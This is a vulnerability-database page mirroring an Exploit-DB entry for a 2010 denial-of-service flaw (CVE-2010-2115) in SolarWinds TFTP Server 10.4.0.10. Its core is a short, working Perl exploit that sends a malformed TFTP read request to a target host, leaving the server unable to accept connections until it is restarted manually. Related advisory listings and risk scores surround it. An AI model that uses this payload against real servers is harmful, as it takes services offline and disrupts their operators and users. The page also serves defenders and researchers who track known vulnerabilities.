Lucene search
+L

SolarWinds TFTP Server 10.4.0.10 - Denial of Service

🗓️ 21 May 2010 00:00:00Reported by NullthreatType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

SolarWinds TFTP Server 10.4.0.10 - Denial of Service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-2115
21 May 201000:00
circl
cve
CVE
CVE-2010-2115
28 May 201020:00
cve
cvelist
Cvelist
CVE-2010-2115
28 May 201020:00
cvelist
metasploit
Metasploit
SolarWinds TFTP Server 10.4.0.10 Denial of Service
4 Jun 201001:20
metasploit
nvd
NVD
CVE-2010-2115
28 May 201020:30
nvd
openvas
OpenVAS
SolarWinds TFTP Server 10.4.0.10 'Read' Request (Opcode 0x01) DoS Vulnerability - Active Check
25 May 201000:00
openvas
packetstorm
Packet Storm
SolarWinds TFTP Server 10.4.0.10 Denial of Service
31 Aug 202400:00
packetstorm
prion
Prion
Cross site request forgery (csrf)
28 May 201020:30
prion
nessus
Tenable Nessus
SolarWinds TFTP Server < 10.4.0.13 DoS
25 Jun 201000:00
nessus
# Exploit Title: Solarwinds TFTP DOS
# Date: 5-21-2010
# Author: Nullthreat
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx
# Version: 10.4.0.10
# Tested on: Windows XP SP3
# Code :

#!/usr/bin/perl
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit
# by Nullthreat
# The application will not crash, but it will stop accepting connections.
# You will be forced to restart the server by hand in the config
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k

use IO::Socket;
$port = "69";
$host = $ARGV[0];
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');

$really=
"\x00\x01". # Opcode 1 = Read Request
"\x01". # The crash....no really thats it
"\x00". # Null byte
"NETASCII". # The mode
"\x00"; # Null byte
$s->send($really);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.55953
29